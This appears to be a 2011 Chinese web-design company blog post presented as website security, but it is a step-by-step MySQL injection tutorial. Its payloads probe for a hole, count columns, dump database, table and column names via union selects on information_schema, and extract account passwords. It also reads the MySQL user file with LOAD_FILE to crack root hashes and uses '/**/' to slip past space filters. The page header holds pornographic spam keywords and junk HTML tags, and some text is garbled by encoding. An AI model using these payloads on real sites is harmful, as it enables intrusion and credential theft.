中文字幕在线有码午夜,国产成 人亚洲91,狼狼狼色在线精品视频免费,久久国产厕所拍精品盗摄

    <sub id="gptbo"><ol id="gptbo"></ol></sub>

      <legend id="gptbo"></legend>

        <legend id="gptbo"></legend>

        <sub id="gptbo"><ol id="gptbo"><nobr id="gptbo"></nobr></ol></sub>
        <legend id="gptbo"><u id="gptbo"><thead id="gptbo"></thead></u></legend>
        <sub id="gptbo"><ol id="gptbo"></ol></sub>

        云南網站建設創(chuàng)新企業(yè) 昆明多彩網絡公司

        網站制作安全之mysql注入技巧

        來源:昆明多彩網絡公司 日期:2011-09-19 閱讀: 發(fā)表評論

        mysql注入指得是通過程序的漏洞(比如沒有過濾),通過執(zhí)行sql語句進行入侵網站并最終得到服務器權限的行為

         mysql注入大致流程:

        1、得到注入點,在頁面參數(shù)后面加'或者and 1=1和and 1=2測試,如果程序報錯或者有一些異常情況(比如執(zhí)行結果不同)發(fā)生則表明該頁面有漏洞存在。

        2、在參數(shù)后面加入 order by 10,10,如果沒有什么反應則將后面的10繼續(xù)增加,如果報錯就說明字段數(shù)少于該數(shù)。

        3、暴數(shù)據(jù)庫名,假設當前被注入表的字段數(shù)有3個,通過下面兩種方式得到

           3.1 union select database(),user(),version()

          3.1 在后面加入 union select 1,SCHEMA_NAME,3 from information_schema.SCHEMATA limit 2,1,將得到數(shù)據(jù)庫名稱,第一個數(shù)據(jù)庫為information_schema

        4、暴表名,and 1=2 union select 1,table_name,3 from (select * from information_schema.tables where table_schema=0x6861636B)t limit 0,1    0x6861636B為數(shù)據(jù)庫名稱轉成了16進制,用小葵花工具轉換得到,通過上一步可以得到,注意limit前面的t不能省略。

        5、暴字段名 and 1=2 union select 1,2,column_name from (select * from information_schema.columns where table_name=0x61646D696E and table_schema=0x6861636B)t limit 0,1;0x61646D696E為表名,table_schema為字段名。

        6、union select 1,"字段1","字段2" from "表名" limit 0,1,就可以得到帳戶和密碼了。

        7、其他:得到root的密碼通過LOAD_FILE(’C:\..\MYSQL\DATA\MYSQL\USER.MYD’)得到用戶的HASH散列,之后用CAIN爆破…如果程序過濾了空格,可以使用/**/相當于空格作用

        發(fā)表評論評論列表(有 條評論)